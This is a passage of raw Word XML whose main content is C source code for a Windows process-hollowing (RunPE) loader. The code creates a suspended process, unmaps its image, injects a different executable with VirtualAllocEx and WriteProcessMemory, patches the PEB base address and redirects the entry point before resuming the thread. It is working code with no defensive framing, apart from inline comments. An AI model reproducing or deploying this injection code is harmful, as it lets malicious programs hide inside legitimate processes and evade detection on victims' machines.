        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// EBX - points to PEB</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So before resuming the suspended thread, we need to set EAX of the context to the entry point of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>// new EXE.</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void doFork(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD imageSize)</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t>  STARTUPINFO si = {0};</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  PROCESS_INFORMATION pi;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  CONTEXT ctx;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  PROCINFO childInfo;</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if(createChild(&amp;pi, &amp;ctx, &amp;childInfo)) </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  {    </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("Original EXE loaded (PID = %d).\n", pi.dwProcessId);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("Original Base Addr = %X, Size = %X\n", childInfo.baseAddr, childInfo.imageSize);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LPVOID v = (LPVOID)NULL;</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lastRenderedPageBreak/>
        <w:t>    if(inpeXH-&gt;imageBase == childInfo.baseAddr &amp;&amp; imageSize &lt;= childInfo.imageSize)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 if new EXE has same baseaddr and is its size is &lt;= to the original EXE, just</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      // overwrite it in memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      v = (LPVOID)childInfo.baseAddr;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      DWORD oldProtect;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      VirtualProtectEx(pi.hProcess, (LPVOID)childInfo.baseAddr, childInfo.imageSize, PAGE_EXECUTE_READWRITE, &amp;oldProtect);      </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printf("Using Existing Mem for New EXE at %X\n", (unsigned long)v);</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else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 get address of ZwUnmapViewOfSection</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      PTRZwUnmapViewOfSection pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection");</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 try to unmap the original EXE image</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      if(pZwUnmapViewOfSection(pi.hProcess, (LPVOID)childInfo.baseAddr) == 0)</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 allocate memory for the new EXE image at the prefered imagebase.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        v = VirtualAllocEx(pi.hProcess, (LPVOID)inpeXH-&gt;imageBase, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        if(v)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>          printf("Unmapped and Allocated Mem for New EXE at %X\n", (unsigned long)v);</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if(!v &amp;&amp; hasRelocationTable(inpeXH))</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 if unmap failed but EXE is relocatable, then we try to load the EXE at another</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      // location</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      v = VirtualAllocEx(pi.hProcess, (void *)NULL, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      if(v)</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lastRenderedPageBreak/>
        <w:t>        printf("Allocated Mem for New EXE at %X. EXE will be relocated.\n", (unsigned long)v);</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 we&amp;#39;ve got to do the relocation ourself if we load the image at another</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        // memory location        </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        doRelocation(inMZ, inPE, inpeXH, inSecHdr, ptrLoc, (DWORD)v);</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printf("EIP = %X\n", ctx.Eip);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("EAX = %X\n", ctx.Eax);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("EBX = %X\n", ctx.Ebx);    // EBX points to PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("ECX = %X\n", ctx.Ecx);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("EDX = %X\n", ctx.Edx);</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if(v)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    {      </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      printf("New EXE Image Size = %X\n", imageSize);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 patch the EXE base addr in PEB (PEB + 8 holds process base addr)</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      DWORD *pebInfo = (DWORD *)ctx.Ebx;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      DWORD wrote;            </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      WriteProcessMemory(pi.hProcess, &amp;pebInfo[2], &amp;v, sizeof(DWORD), &amp;wrote);</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 patch the base addr in the PE header of the EXE that we load ourselves</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      PE_ExtHeader *peXH = (PE_ExtHeader *)((DWORD)inMZ-&gt;offsetToPE + sizeof(PE_Header) + (DWORD)ptrLoc);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      peXH-&gt;imageBase = (DWORD)v;</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if(WriteProcessMemory(pi.hProcess, v, ptrLoc, imageSize, NULL))</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      {  </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        printf("New EXE image injected into process.\n");</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ctx.ContextFlags=CONTEXT_FULL;        </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        //ctx.Eip = (DWORD)v + ((DWORD)dllLoaderWritePtr - (DWORD)ptrLoc);</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if((DWORD)v == childInfo.baseAddr)</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lastRenderedPageBreak/>
        <w:t>        {</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>          ctx.Eax = (DWORD)inpeXH-&gt;imageBase + inpeXH-&gt;addressOfEntryPoint;    // eax holds new entry point</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else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 in this case, the DLL was not loaded at the baseaddr, i.e. manual relocation was</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>          // performed.</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>          ctx.Eax = (DWORD)v + inpeXH-&gt;addressOfEntryPoint;    // eax holds new entry point</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printf("********&gt; EIP = %X\n", ctx.Eip);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        printf("********&gt; EAX = %X\n", ctx.Eax);</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SetThreadContext(pi.hThread,&amp;ctx);</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ResumeThread(pi.hThread);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        printf("Process resumed (PID = %d).\n", pi.dwProcessId);</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else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printf("WriteProcessMemory failed\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        TerminateProcess(pi.hProcess, 0);</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else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printf("Load failed.  Consider making this EXE relocatable.\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      TerminateProcess(pi.hProcess, 0);</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else</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printf("Cannot load %s\n", TARGETPROC);</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int main(int argc, char* argv[])</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lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  if(argc != 2)</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printf("\nUsage: %s &lt;EXE filename&gt;\n", argv[0]);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return 1;</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FILE *fp = fopen(argv[1], "rb");</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  if(fp)</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MZHeader mzH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    PE_Header peH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    PE_ExtHeader peXH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    SectionHeader *secHdr;</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if(readPEInfo(fp, &amp;mzH, &amp;peH, &amp;peXH, &amp;secHdr))</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int imageSize = calcTotalImageSize(&amp;mzH, &amp;peH, &amp;peXH, secHdr);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      //printf("Image Size = %X\n", imageSize);</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LPVOID ptrLoc = VirtualAlloc(NULL, imageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>      if(ptrLoc)</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//printf("Memory allocated at %X\n", ptrLoc);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        loadPE(fp, &amp;mzH, &amp;peH, &amp;peXH, secHdr, ptrLoc);                        </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doFork(&amp;mzH, &amp;peH, &amp;peXH, secHdr, ptrLoc, imageSize);                </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else</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        printf("Allocation failed\n");</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fclose(fp);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  }</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  else</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    printf("\nCannot open the EXE file!\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  return 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC33D1" w:rsidRPr="00042699" w:rsidRDefault="00042699" w:rsidP="00042699">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>人情如冰六月</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00EC33D1" w:rsidRPr="000426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638" w:rsidRDefault="00201638" w:rsidP="00EC33D1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00201638" w:rsidRDefault="00201638" w:rsidP="00EC3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638" w:rsidRDefault="00201638" w:rsidP="00EC33D1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00201638" w:rsidRDefault="00201638" w:rsidP="00EC33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493"/>
    <w:rsid w:val="00042699"/>
    <w:rsid w:val="00201638"/>
    <w:rsid w:val="00697493"/>
    <w:rsid w:val="00C70B75"/>
    <w:rsid w:val="00EC33D1"/>
    <w:rsid w:val="00F82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311408-0CFB-4D15-B201-41B9232A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link w:val="5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0004269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33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33D1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EC33D1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EC33D1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00EC33D1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="5Char">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00042699"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="headactions">
    <w:name w:val="headactions"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00042699"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0004269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547183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
